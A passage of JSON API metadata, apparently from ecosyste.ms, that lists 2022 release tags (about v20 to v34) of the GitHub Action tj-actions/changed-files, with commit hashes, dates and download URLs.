https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.2/manifests"},{"name":"v34.0.1","sha":"9f289689bb8364780830da00b69507b88b5a2f07","kind":"commit","published_at":"2022-10-31T00:13:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.1","dependencies_parsed_at":"2023-11-09T04:04:21.471Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.1/manifests"},{"name":"v34.0.0","sha":"c4d29bf5b2769a725bcc9a723c498ba9c34c05b4","kind":"commit","published_at":"2022-10-25T22:04:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v34.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v34.0.0","dependencies_parsed_at":"2023-11-09T04:04:22.875Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v34.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v34.0.0/manifests"},{"name":"v33.0.0","sha":"aa52cfcd81f1a00a6bf1241a8cad6adec4d80638","kind":"commit","published_at":"2022-10-21T14:48:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v33.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v33.0.0","dependencies_parsed_at":"2023-11-09T04:04:48.651Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v33.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v33.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v33.0.0/manifests"},{"name":"v33","sha":"aa52cfcd81f1a00a6bf1241a8cad6adec4d80638","kind":"commit","published_at":"2022-10-21T14:48:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v33","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v33","dependencies_parsed_at":"2023-11-09T04:04:21.893Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v33/manifests"},{"name":"v32","sha":"1d6e210c970d01a876fbc6155212d068e79ca584","kind":"commit","published_at":"2022-10-16T04:33:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32","dependencies_parsed_at":"2023-11-09T04:04:48.275Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32/manifests"},{"name":"v32.1.2","sha":"1d6e210c970d01a876fbc6155212d068e79ca584","kind":"commit","published_at":"2022-10-16T04:33:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32.1.2","dependencies_parsed_at":"2023-11-09T04:04:26.081Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.2/manifests"},{"name":"v32.1.1","sha":"8953e851a137075e59e84b5c15fbeb3617e82f15","kind":"commit","published_at":"2022-10-14T19:22:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32.1.1","dependencies_parsed_at":"2023-11-09T04:04:22.954Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.1/manifests"},{"name":"v32.1.0","sha":"8de562e9316b23c4473ad852e5fd4f7f2bac7bc8","kind":"commit","published_at":"2022-10-12T20:34:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32.1.0","dependencies_parsed_at":"2023-11-09T04:04:24.651Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.1.0/manifests"},{"name":"v32.0.1","sha":"7c640bd299646362775f9d02e156bc741f67453b","kind":"commit","published_at":"2022-10-11T10:33:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32.0.1","dependencies_parsed_at":"2023-11-09T04:04:21.505Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.0.1/manifests"},{"name":"v32.0.0","sha":"270645280afddc7e2cf3f4867089522c8f2f8f9a","kind":"commit","published_at":"2022-10-06T03:34:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v32.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v32.0.0","dependencies_parsed_at":"2023-11-09T04:04:21.038Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v32.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v32.0.0/manifests"},{"name":"v31","sha":"dd7c81416dd9ddc14c594f751cd92c661e13daee","kind":"commit","published_at":"2022-10-02T13:33:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v31","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v31","dependencies_parsed_at":"2023-11-09T04:04:24.044Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31/manifests"},{"name":"v31.0.3","sha":"dd7c81416dd9ddc14c594f751cd92c661e13daee","kind":"commit","published_at":"2022-10-02T13:33:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v31.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v31.0.3","dependencies_parsed_at":"2023-11-09T04:04:21.503Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v31.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.3/manifests"},{"name":"v31.0.2","sha":"528984a4f814905ea80ed2a3818afc97aef8b0de","kind":"commit","published_at":"2022-09-29T02:49:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v31.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v31.0.2","dependencies_parsed_at":"2023-11-09T04:04:28.683Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v31.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.2/manifests"},{"name":"v31.0.1","sha":"75af1a47c484c669beec6a1d00fc9d1d78179725","kind":"commit","published_at":"2022-09-25T15:46:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v31.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v31.0.1","dependencies_parsed_at":"2023-11-09T04:04:36.453Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v31.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.1/manifests"},{"name":"v31.0.0","sha":"5184a750a66da08aba414ca223aef75c055956a5","kind":"commit","published_at":"2022-09-25T06:12:03.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v31.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v31.0.0","dependencies_parsed_at":"2023-11-09T04:04:23.952Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v31.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v31.0.0/manifests"},{"name":"v30","sha":"402f3827f0f759df60b674e7f52a02d6f4a5af8b","kind":"commit","published_at":"2022-09-24T05:46:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v30","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v30","dependencies_parsed_at":"2023-11-09T04:04:36.561Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v30/manifests"},{"name":"v30.0.0","sha":"402f3827f0f759df60b674e7f52a02d6f4a5af8b","kind":"commit","published_at":"2022-09-24T05:46:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v30.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v30.0.0","dependencies_parsed_at":"2023-11-09T04:04:28.123Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v30.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v30.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v30.0.0/manifests"},{"name":"v29","sha":"f7a56405a89ea095c6230f10e7f1c49daab13b35","kind":"commit","published_at":"2022-09-20T04:57:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29","dependencies_parsed_at":"2023-11-09T04:04:21.031Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29/manifests"},{"name":"v29.0.9","sha":"f7a56405a89ea095c6230f10e7f1c49daab13b35","kind":"commit","published_at":"2022-09-20T04:57:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.9","dependencies_parsed_at":"2023-11-09T04:04:47.667Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.9/manifests"},{"name":"v29.0.8","sha":"df4dacaa89cace34cd60d5e9580f041a041e5233","kind":"commit","published_at":"2022-09-20T02:25:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.8","dependencies_parsed_at":"2023-11-09T04:04:24.030Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.8/manifests"},{"name":"v29.0.7","sha":"602081b5d9327a7770b4c447a4ee8984ae44e72e","kind":"commit","published_at":"2022-09-13T16:22:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.7","dependencies_parsed_at":"2023-11-09T04:04:40.755Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.7/manifests"},{"name":"v29.0.6","sha":"6e12407521ea9b0d11a4b7ab09b40266bd39496a","kind":"commit","published_at":"2022-09-13T14:27:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.6","dependencies_parsed_at":"2023-11-09T04:04:22.085Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.6/manifests"},{"name":"v29.0.5","sha":"c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e","kind":"commit","published_at":"2022-09-13T04:34:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.5","dependencies_parsed_at":"2023-11-09T04:04:26.079Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.5/manifests"},{"name":"v29.0.4","sha":"c41b7152594c4423f3787d26662239eb0ae027c0","kind":"commit","published_at":"2022-09-08T01:55:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.4","dependencies_parsed_at":"2023-11-09T04:04:22.969Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.4/manifests"},{"name":"v29.0.3","sha":"60f4aabced9b4718c75acef86d42ffb631c4403a","kind":"commit","published_at":"2022-09-03T02:39:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.3","dependencies_parsed_at":"2023-11-09T04:04:24.016Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.3/manifests"},{"name":"v29.0.2","sha":"82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220","kind":"commit","published_at":"2022-08-29T04:13:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.2","dependencies_parsed_at":"2023-11-09T04:04:31.527Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.2/manifests"},{"name":"v29.0.1","sha":"18edda74753bbb7090ea030c1f80ef9610ebdff1","kind":"commit","published_at":"2022-08-26T05:45:04.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.1","dependencies_parsed_at":"2023-11-09T04:04:41.404Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.1/manifests"},{"name":"v29.0.0","sha":"bec82ebb3493119ba317fcee8a0d1db09d39d1ac","kind":"commit","published_at":"2022-08-23T14:40:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v29.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v29.0.0","dependencies_parsed_at":"2023-11-09T04:04:22.386Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v29.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v29.0.0/manifests"},{"name":"v28.0.0","sha":"28ac6724247a133793509b5d165d58319b40a171","kind":"commit","published_at":"2022-08-21T19:04:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v28.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v28.0.0","dependencies_parsed_at":"2023-11-09T04:04:48.499Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v28.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v28.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v28.0.0/manifests"},{"name":"v28","sha":"602cf940579b9a2b2db0aafe835bfdb675fac12c","kind":"commit","published_at":"2022-08-21T17:11:00.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v28","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v28","dependencies_parsed_at":"2023-11-09T04:04:31.738Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v28/manifests"},{"name":"v27","sha":"5e56dcabdd4a97ea745791856930038be56d9b70","kind":"commit","published_at":"2022-08-17T21:46:38.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v27","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v27","dependencies_parsed_at":"2023-11-09T04:04:48.401Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v27/manifests"},{"name":"v26.1","sha":"58ae566dc69a926834e4798bcfe0436ff97c0599","kind":"commit","published_at":"2022-08-15T09:20:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v26.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v26.1","dependencies_parsed_at":"2023-11-09T04:04:41.648Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v26.1/manifests"},{"name":"v26","sha":"7394701157dae4adb4eaa75d8c99e9b2edff81fe","kind":"commit","published_at":"2022-08-15T02:45:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v26","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v26","dependencies_parsed_at":"2023-11-09T04:04:21.332Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v26/manifests"},{"name":"v25","sha":"36e65a11651994e93d6f1ef3afa781c3dcbb9780","kind":"commit","published_at":"2022-08-08T18:27:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v25","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v25","dependencies_parsed_at":"2023-11-09T04:04:31.253Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v25/manifests"},{"name":"v24.1","sha":"bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c","kind":"commit","published_at":"2022-08-03T21:07:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v24.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v24.1","dependencies_parsed_at":"2023-11-09T04:04:20.739Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v24.1/manifests"},{"name":"v24","sha":"6c44eb8294bb9c93d6118427f4ff8404b695e1d7","kind":"commit","published_at":"2022-07-22T00:33:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v24","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v24","dependencies_parsed_at":"2023-11-09T04:04:41.772Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v24/manifests"},{"name":"v23.2","sha":"b2ee165d6b42ab1740e1037eb93748aad96767c5","kind":"commit","published_at":"2022-07-18T20:34:41.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v23.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v23.2","dependencies_parsed_at":"2023-11-09T04:04:23.573Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23.2/manifests"},{"name":"v23.1","sha":"34a865a2b221bd60ec0d4c071f5e7a66ffdac88a","kind":"commit","published_at":"2022-06-24T04:19:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v23.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v23.1","dependencies_parsed_at":"2023-11-09T04:04:48.600Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23.1/manifests"},{"name":"v23","sha":"fb1fe28aa9ff24afc553b37545437005a4cf2115","kind":"commit","published_at":"2022-06-12T14:11:04.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v23","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v23","dependencies_parsed_at":"2023-11-09T04:04:25.575Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v23/manifests"},{"name":"v22.2","sha":"ae90a0b602c90d598c0c027a519493c1a069543e","kind":"commit","published_at":"2022-06-02T16:15:18.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v22.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v22.2","dependencies_parsed_at":"2023-11-09T04:04:48.317Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22.2/manifests"},{"name":"v22.1","sha":"bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d","kind":"commit","published_at":"2022-05-31T16:48:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v22.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v22.1","dependencies_parsed_at":"2023-11-09T04:04:25.897Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22.1/manifests"},{"name":"v22","sha":"3de1f9a283b61f308ee3045be4d301037657225a","kind":"commit","published_at":"2022-05-31T03:38:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v22","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v22","dependencies_parsed_at":"2023-11-09T04:04:25.062Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v22/manifests"},{"name":"v21","sha":"0edfedf16d9ff0903cbe599d474a022823ca8fb8","kind":"commit","published_at":"2022-05-25T21:47:58.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v21","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v21","dependencies_parsed_at":"2023-11-09T04:04:24.634Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v21/manifests"},{"name":"v20.2","sha":"205450238e81d3da0e0ec2d776f58c12846fddfb","kind":"commit","published_at":"2022-05-24T04:14:06.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v20.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v20.2","dependencies_parsed_at":"2023-11-09T04:04:24.392Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v20.2/manifests"},{"name":"v20.1","sha":"944a8b89098b24b0723ed9264888eb7fcffbbe9a","kind":"commit","published_at":"2022-05-22T05:20:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.g